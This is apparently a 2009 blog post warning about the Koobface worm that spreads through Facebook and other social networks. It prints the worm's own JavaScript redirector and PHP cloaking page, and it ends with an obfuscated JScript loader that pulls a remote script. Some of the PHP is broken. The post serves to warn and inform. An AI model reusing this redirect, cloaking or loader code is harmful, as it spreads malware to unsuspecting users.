Note: I want to make clear, for those who have not realised it, that the sources (php, js) published in this article correspond to the 56th facet of the latest Koobface worm. I discovered them by being a target of this worm-type virus myself, which explains the sparseness of my comments on the sources. The primary purpose of this article is prevention.
Recently I was able to identify a very large worm-type malware spreading across social networks. The non-hidden part of the malware (javascript) that I analysed uses your session to spread a malicious link to all your contacts; the targets of this malware are none other than facebook, tagged, friendster, myspace.com, msplinks.com, myyearbook, hi5, fubar, bebo, youtube.
A huge w0rm-type malware, for now not detected by antivirus products, which takes care of sending a message containing the malicious link to all your contacts.
First snag: the malicious link is hosted on an official American site, « 6th International Conference »; here is the URL: 6icpmf.org.
And it spreads into your Facebook inbox like this:
Yoour naaked daances weere fillmed!

Once the link is clicked, it may redirect you to a fake YouTube page offering to install the famous Flash Player plugin to view the video. As you will have understood, this Adobe Flash Player plugin hides a malicious executable whose purpose is to take over your computer remotely, like a trojan.
Here is a piece of the worm source I was able to identify:
var abc1 = 'http://redir0705.com/go/';
var abc2 = 'http://redir0805.com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook.com', abc+'fb.php'],
['tagged.com', abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com', abc+'ms.php'],
['msplinks.com', abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com', abc+'fu.php'],
['hi5.com', abc+'hi5.php'],
['bebo.com', abc+'be.php']
];
var s = '' + document.referrer, r = false;
for (var i = 0; i < redirects.length; i ++) {
if ((s.indexOf(redirects[i][0]) != -1)) {
var redir=redirects[i][1] + location.search;
if ((location.search).length>0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
location.href = redir;
r = true;
break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;
The web is put at risk once again! That is why I call on all users of these social networks to be vigilant: do not click on suspicious links, or if you do, do not hesitate to search Google for the origin of the link; if the search shows no result confirming your fears, it would be wise of you not to go any further. Since the NoScript plugin remains powerless against this attack, only vigilance, and disabling javascript via the Firefox Web Developer plugin for example, is strongly recommended.
Note on Koobface:
Koobface is nothing more nor less than the name Facebook has given to the malware that spreads through its site. There are no attack types specific to Koobface, no real characteristics (other than that most of them use web languages); it can just as well be a simple XSS shell as a worm, or even advanced phishing in javascript. The only thing these attacks have in common is the malicious link, which is why I thought it important to point it out here.
After a light investigation on Google, one can see that the javascript is generated by PHP, no doubt to encrypt the attack and make certain files unreadable.
edit:
Gnucitizen says: « No more free bugs » you say. I say that you are leading people to become the next generation of cyber menace. Perhaps you forgot that the information security community was built on and thrived because of a simple but fundamental principle: « knowledge must be free ».
// new variant by floppy
error_reporting(0);
ini_set('error_reporting', 0);
if (isset($_GET['test']) && $_GET['test']==1)
{
print "KROTEG";
exit();
}
$magicparam="ff";
$magicparam=substr(md5(date("H")), 0, 2);
$magicvalue=substr(md5(date("H")), 3, 2);
$randparam="a".substr(md5(rand(1,9999)),0,rand(3,10));
$randvalue=substr(md5(rand(1,9999)),0,rand(1,10));
//echo "$magicparam";
function miss ($key) {
$massiv=array(
'qwa',
'weqasd23v',
'ewrdfs34',
'retdfg45',
'tryfgh56',
'ytu67ghji',
'uiyhjk78',
'iuojkl89y',
'oipkl90',
'pol',
'azsqw',
'sweadxz',
'dfresxc',
'fdgrtcv',
'gfhtyvb',
'hgjyubn',
'jhkuinm',
'kjliomc',
'lkop',
'zasx',
'xzcsd',
'cxvdfk',
'vcbfg',
'bghvn',
'nbhjm',
'mnjk'
);
//$key=$_POST['domain_name'];
$missletters=0;
$missorder=0;
$missdouble=1;
$missneighbors=0;
$newone=count($massiv);
$errorslovo=$key;
$opo=array();
for($j=0;$j<$count; $i++) {
$str = $tmp[$i];
if (strlen($str)>3) {
$arr = miss($str);
$str = $arr[rand(0, count($arr)-1)];
//var_dump($str);
}
$new_str.= " ".$str;
}
if (strlen($t)>0)
{
$new_str=trim($new_str);
$new_str="<$t>$new_str";
}
return trim($new_str);
}
$vars = array("black","navy","blue","green","teal","lime","aqua","maroon","purple","olive","gray","silver","red","fuchsia","yellow","white");
$js_f = $vars[rand(0, count($vars) - 1)].$vars[rand(0, count($vars) - 1)];
$js_id = $vars[rand(0, count($vars) - 1)];
$title = "";
$t = array("video", "films", "movie", "youtube", "home entertainment","movies","television","tv","studios","home video","dvd","theater","now available","rentals","widescreen");
for ($i=0; $i<6; $i++) {
$title .= $t[rand(0, count($t) - 1)]." ";
}
$arr = array(
"And in his name shall the Gentiles trust. Then was brought unto him one possessed with
a devil, blind, and dumb: and he healed him, insomuch that the blind and dumb both spake and saw. ",
"And all the people were amazed, and said, Is not this the son of David?",
"But when the Pharisees heard it, they said, This fellow doth not cast out devils, but by
Beelzebub the prince of the devils. And Jesus knew their thoughts, and said unto them, Every kingdom
divided against itself is brought to desolation; and every city or house divided against itself shall not stand:
And if Satan cast out Satan, he is divided against himself; how shall then his kingdom stand?
And if I by Beelzebub cast out devils, by whom do your children cast them out? therefore they shall be your judges. ",
"Then one said unto him, Behold, thy mother and thy brethren stand without, desiring to
speak with thee. But he answered and said unto him that told him, Who is my mother? and who are
my brethren? And he stretched forth his hand toward his disciples, and said, Behold my mother and my brethren!",
"Then goeth he, and taketh with himself seven other spirits more wicked than himself, and they
enter in and dwell there: and the last state of that man is worse than the first. Even so shall it be also
unto this wicked generation. While he yet talked to the people, behold, his mother and his brethren stood
without, desiring to speak with him.",
"The queen of the south shall rise up in the judgment with this generation, and shall condemn it:
for she came from the uttermost parts of the earth to hear the wisdom of Solomon; and, behold, a greater
than Solomon is here. When the unclean spirit is gone out of a man, he walketh through dry places, seeking
rest, and findeth none. Then he saith, I will return into my house from whence I came out; and when he is
come, he findeth it empty, swept, and garnished.",
"Then certain of the scribes and of the Pharisees answered, saying, Master, we would see a sign
from thee. But he answered and said unto them, An evil and adulterous generation seeketh after a sign;
and there shall no sign be given to it, but the sign of the prophet Jonas: For as Jonas was three days and
three nights in the whale's belly; so shall the Son of man be three days and three nights in the heart of
the earth. The men of Nineveh shall rise in judgment with this generation, and shall condemn it: because
they repented at the preaching of Jonas; and, behold, a greater than Jonas is here.",
"A good man out of the good treasure of the heart bringeth forth good things: and an evil man
out of the evil treasure bringeth forth evil things. But I say unto you, That every idle word that men shall
speak, they shall give account thereof in the day of judgment. For by thy words thou shalt be justified,
and by thy words thou shalt be condemned.",
"And whosoever speaketh a word against the Son of man, it shall be forgiven him: but whosoever
speaketh against the Holy Ghost, it shall not be forgiven him, neither in this world, neither in the world to come.
Either make the tree good, and his fruit good; or else make the tree corrupt, and his fruit corrupt: for the tree
is known by his fruit. O generation of vipers, how can ye, being evil, speak good things? for out of the
abundance of the heart the mouth speaketh.",
"Or else how can one enter into a strong man's house, and spoil his goods, except he first bind
the strong man? and then he will spoil his house. He that is not with me is against me; and he that gathereth
not with me scattereth abroad. Wherefore I say unto you, All manner of sin and blasphemy shall be forgiven
unto men: but the blasphemy against the Holy Ghost shall not be forgiven unto men.",
"But when the Pharisees heard it, they said, This fellow doth not cast out devils, but by Beelzebub
the prince of the devils. And Jesus knew their thoughts, and said unto them, Every kingdom divided against
itself is brought to desolation; and every city or house divided against itself shall not stand:
And if Satan cast out Satan, he is divided against himself; how shall then his kingdom stand?
And if I by Beelzebub cast out devils, by whom do your children cast them out? therefore they shall be your judges.
But if I cast out devils by the Spirit of God, then the kingdom of God is come unto you.",
"And he stretched it forth; and it was restored whole, like as the other. Then the Pharisees went out,
and held a council against him, how they might destroy him. But when Jesus knew it, he withdrew himself from
thence: and great multitudes followed him, and he healed them all; And charged them that they should not make
him known: That it might be fulfilled which was spoken by Esaias the prophet, saying, Behold my servant,
whom I have chosen; my beloved, in whom my soul is well pleased: I will put my spirit upon him,
and he shall shew judgment to the Gentiles."
);
$cook=false;
$ref=false;
$reload=false;
if (isset($_COOKIE[$magicparam]) && $_COOKIE[$magicparam]==$magicvalue) $cook=true;
if (isset($_SERVER['HTTP_REFERER']))
{
$ref=true;
$fr="http://".$_SERVER['HTTP_HOST'];
if (strstr(strtolower($_SERVER['HTTP_REFERER']),strtolower($fr))) {
$reload=true; // this is javascript call
}
}
if ($reload)
{
if ($cook)
{
$host = $_SERVER['HTTP_HOST'];
// got cook. redir here
if (isset($_COOKIE[$magicparam]))
if ($_COOKIE[$magicparam]==$magicvalue)
{
$red="var abc1 = 'hxxp://y18032009.com/go/';".
"var abc2 = 'hxxp://redir1504.com/go/';".
"var ss = '' + location.search;".
"if ((location.search).length>0 && (ss.indexOf('ids=2') == -1)) abc = abc1; else abc = abc2;".
"var redirects = [".
"['facebook.com', abc+'fb.php'],".
"['tagged.com', abc+'tg.php'],".
"['friendster.com',abc+'fr.php'],".
"['myspace.com', abc+'ms.php'],".
"['msplinks.com', abc+'ms.php'],".
"['myyearbook.com',abc+'yb.php'],".
"['fubar.com', abc+'fu.php'],".
"['hi5.com', abc+'hi5.php'],".
"['bebo.com', abc+'be.php']".
"];".
"var s = '' + document.referrer, r = false;".
"for (var i = 0; i < redirects.length; i ++) {".
"if ((s.indexOf(redirects[i][0]) != -1)) {".
" var redir=redirects[i][1] + location.search; ".
" if ((location.search).length>0) redir=redir+'&domain=".$host."'; else redir=redir+'?domain=".$host."'; ".
" location.href = redir; ".
" r = true; ".
" break; ".
"}".
"}".
"if (!r) location.href = abc+'index.php'+ location.search;";
echo $red;
}
}
}
else
{
setcookie($magicparam, $magicvalue);
$rscript='';
print '
'.$title.'
';
$NUMTEXTS=5;
$scriptpos=rand(0,$NUMTEXTS-1);
for ($a=0;$a<$NUMTEXTS;$a++)
{
if ($a==$scriptpos) echo $rscript."\n";
echo miss2($arr[rand(0, count($arr)-1)])."\n";
}
echo '';
}
exit();
?>
The HTML following the source of the PHP file:
/*@cc_on @*/ /*@if (@_win32) var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0hfpwj{ju0tubut/kt#?=0tdsjqu?"; var result = ""; for(var i=0;i <source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); document.write(result);
I would like to thank the sites that have supported my article and added information to it.
Blogs supporting this article:
French:
http://mad.internetpol.fr/archives/45-Koobface-La-confiance-accordee-a-vos-relations-doit-cesser..html
Spanish:
http://blog.s21sec.com/2009/05/koobface-tirando-del-hilo.html
.p3Lo
Update:
source: on Google, sbcglobal.net.
